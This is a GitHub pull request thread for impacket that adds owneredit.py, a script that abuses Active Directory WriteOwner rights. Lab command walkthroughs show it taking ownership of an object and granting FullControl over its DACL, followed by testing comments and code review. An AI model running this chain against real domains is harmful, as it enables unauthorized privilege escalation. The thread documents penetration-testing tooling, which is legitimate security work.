[owneredit.py] New example script to change an object's owner
fortra/impacket pull request #1323
Opened 2022-05-14 16:51 UTC by ShutdownRepo

Added this script to abuse WriteOwner (`ADS_RIGHT_WRITE_OWNER`) access rights. This allows to take ownership of another object, and then edit that object's DACL (with #1291 for example).

## 1. Edit DACL : failure

Trying to edit an `victim`'s DACL (with #1291) . But it doesn't work, `attacker` doesn't have WriteDACL, and is not owner of `victim`.
```
# dacledit.py -principal 'attacker' -target 'victim' -dc-ip '192.168.56.101' 'domain.local'/'attacker':'123Pentest!!!' -action write -rights FullControl
Impacket v0.10.1.dev1+20220508.142945.5eb53ce9 - Copyright 2022 SecureAuth Corporation

[*] DACL backed up to dacledit-20220514-184038.bak
[-] Could not modify object, the server reports insufficient rights: 00000005: SecErr: DSID-03152857, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
```

## 2. Edit Owner

Now using owneredit to change `victim`'s owner to `attacker`.
```
# python3 examples/owneredit.py -target 'victim' domain.local/domainadmin:belikewater -dc-ip 192.168.56.101 -action write -new-owner attacker       
Impacket v0.9.25.dev1+20220501.152640.c5d141e1 - Copyright 2021 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-229151724-2089186347-2907854869-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=domain,DC=local
[*] OwnerSid modified successfully!
[*] Current owner information below
[*] - SID: S-1-5-21-229151724-2089186347-2907854869-1118
[*] - sAMAccountName: attacker
[*] - distinguishedName: CN=attacker,CN=Users,DC=domain,DC=local
```

## 3. Edit DACL : success

```
# dacledit.py -principal 'attacker' -target 'victim' -dc-ip '192.168.56.101' 'domain.local'/'attacker':'123Pentest!!!' -action remove -rights FullControl
Impacket v0.10.1.dev1+20220508.142945.5eb53ce9 - Copyright 2022 SecureAuth Corporation

[*] DACL backed up to dacledit-20220514-184128.bak
[*] DACL modified successfully!
```
```
# dacledit.py -principal 'attacker' -target 'victim' -dc-ip '192.168.56.101' 'domain.local'/'attacker':'123Pentest!!!'                                   
Impacket v0.10.1.dev1+20220508.142945.5eb53ce9 - Copyright 2022 SecureAuth Corporation

[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-229151724-2089186347-2907854869-1118)
[*]   ACE[20] info                
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : attacker (S-1-5-21-229151724-2089186347-2907854869-1118)
```

## Usage

Script accepts target and new owner in multiple formats (sAMAccountName, Security IDentifier or distinguishedName)
```
owner:
  Object, controlled by the attacker, to set as owner of the target object

  -new-owner NAME       sAMAccountName
  -new-owner-sid SID    Security IDentifier
  -new-owner-dn DN      Distinguished Name

target:
  Target object to edit the owner of

  -target NAME          sAMAccountName
  -target-sid SID       Security IDentifier
  -target-dn DN         Distinguished Name

dacl editor:
  -action [{read,write}]
                        Action to operate on the owner attribute
```

2022-05-14 17:51 UTC, ShutdownRepo commented
This script needs testing. In my lab, I have an issue when changing the owner of an object when A to B then B to A.
A to B works when I have WriteOwner rights, which is expected. But then reverting B to A (using the same creds of the user with WriteOwner permissions) throws a constraint violation.

```
[-] Could not modify object, the server reports a constrained violation: 0000051B: AtrErr: DSID-030F2312, #1:
	0: 0000051B: DSID-030F2312, problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 20119 (nTSecurityDescriptor)
```

If anyone could test in their lab and help me find out the issue it'd be awesome :smiley:

2022-06-10 20:35 UTC, BlWasp commented
The script works perfectly in my lab, even in the scenario "from A to B then B to A". I haven't seen any issue for the moment:

```bash
> owneredit.py -new-owner BlWasp -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
[*] - sAMAccountName: Administrator
[*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
[*] OwnerSid modified successfully!

> owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
[*] - sAMAccountName: blwasp
[*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local

> owneredit.py -new-owner Administrator -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
[*] - sAMAccountName: blwasp
[*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
[*] OwnerSid modified successfully!

> owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation

[*] Current owner information below
[*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
[*] - sAMAccountName: Administrator
[*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
```

2022-06-13 09:27 UTC, ShutdownRepo commented
> The script works perfectly in my lab, even in the scenario "from A to B then B to A". I haven't seen any issue for the moment:
> 
> ```shell
> > owneredit.py -new-owner BlWasp -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
> Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> 
> [*] Current owner information below
> [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
> [*] - sAMAccountName: Administrator
> [*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
> [*] OwnerSid modified successfully!
> 
> > owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
> Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> 
> [*] Current owner information below
> [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
> [*] - sAMAccountName: blwasp
> [*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
> 
> > owneredit.py -new-owner Administrator -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
> Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> 
> [*] Current owner information below
> [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
> [*] - sAMAccountName: blwasp
> [*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
> [*] OwnerSid modified successfully!
> 
> > owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
> Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> 
> [*] Current owner information below
> [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
> [*] - sAMAccountName: Administrator
> [*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
> ```

Thank you for testing! I didn't specify it in my previous comment but I wasn't facing this issue when using a domain administrator account. It was happening when abusing `WriteOwner` permissions.

2022-06-13 16:56 UTC, BlWasp commented
> > The script works perfectly in my lab, even in the scenario "from A to B then B to A". I haven't seen any issue for the moment:
> > ```shell
> > > owneredit.py -new-owner BlWasp -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
> > Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> > 
> > [*] Current owner information below
> > [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
> > [*] - sAMAccountName: Administrator
> > [*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
> > [*] OwnerSid modified successfully!
> > 
> > > owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
> > Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> > 
> > [*] Current owner information below
> > [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
> > [*] - sAMAccountName: blwasp
> > [*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
> > 
> > > owneredit.py -new-owner Administrator -target BlWasp -dc-ip 192.168.1.75 -action write 'LAB'/'Administrator':'Password123!'
> > Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> > 
> > [*] Current owner information below
> > [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-1103
> > [*] - sAMAccountName: blwasp
> > [*] - distinguishedName: CN=Black Wasp,CN=Users,DC=lab,DC=local
> > [*] OwnerSid modified successfully!
> > 
> > > owneredit.py -target BlWasp -dc-ip 192.168.1.75 -action read 'LAB'/'Administrator':'Password123!'
> > Impacket v0.10.1.dev1+20220514.194727.5c477e71 - Copyright 2022 SecureAuth Corporation
> > 
> > [*] Current owner information below
> > [*] - SID: S-1-5-21-2570265163-3918697770-3667495639-500
> > [*] - sAMAccountName: Administrator
> > [*] - distinguishedName: CN=Administrator,CN=Users,DC=lab,DC=local
> > ```
> 
> Thank you for testing! I didn't specify it in my previous comment but I wasn't facing this issue when using a domain administrator account. It was happening when abusing `WriteOwner` permissions.

Ah yes exactly ! In my lab I encounter the same issue. More generally, it appears that after a owner modification, it is no more possible to change it with the script, but it is still possible to change the owner manually via the **ADSI Edit** tool on the Domain Controller.
However, even after this manual modification it seems that the script still doesn't work and the same error returns for any new owner different from "B" (it is still possible to modify the owner to the same value that what set during "A to B").

2023-10-12 08:35 UTC, BlWasp commented
Anything new about this ?

2023-10-12 08:50 UTC, ShutdownRepo commented
> Anything new about this ?

@anadrianmanrique  ?

2024-05-17 13:42 UTC, anadrianmanrique commented
@ShutdownRepo hello! I'm going to be reviewing this one for 0.12 release. This one seems like shuld've been integrated after dacledit.py. In the meanwhile, there's duplicated code that could be moved to the lib. I'll specify this in the code review section.

2024-05-17 13:51 UTC, anadrianmanrique requested changes

2024-05-17 13:51 UTC, anadrianmanrique commented on examples/owneredit.py
> +# SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved.
update copyright notice to : Copyright (C) 2024 Fortra. All rights reserved.

2024-05-17 13:51 UTC, anadrianmanrique commented on examples/owneredit.py
> +# Universal SIDs
move this to a lib, to be used by dacledit.py and this one Also consider fixing single backslash issue in lines 94 to 111. ( see PR #1742 )

2024-05-17 13:51 UTC, anadrianmanrique commented on examples/owneredit.py
> +    def search_target_principal_security_descriptor(self):
move duplicated function ( and resolveSID also ) to a lib ( i.e. impacket/examples/ldap_helpers.py ) to be used by dacledit.py and this one

2024-06-05 19:44 UTC, anadrianmanrique commented
Ok, I'll move forward with this. I'll merge this once finished with testing, and the apply changes in a sperate PR.
thanks

2024-06-06 00:15 UTC, ShutdownRepo commented
Sorry I can't find the time to do the changes for now...

2024-06-06 14:14 UTC, merged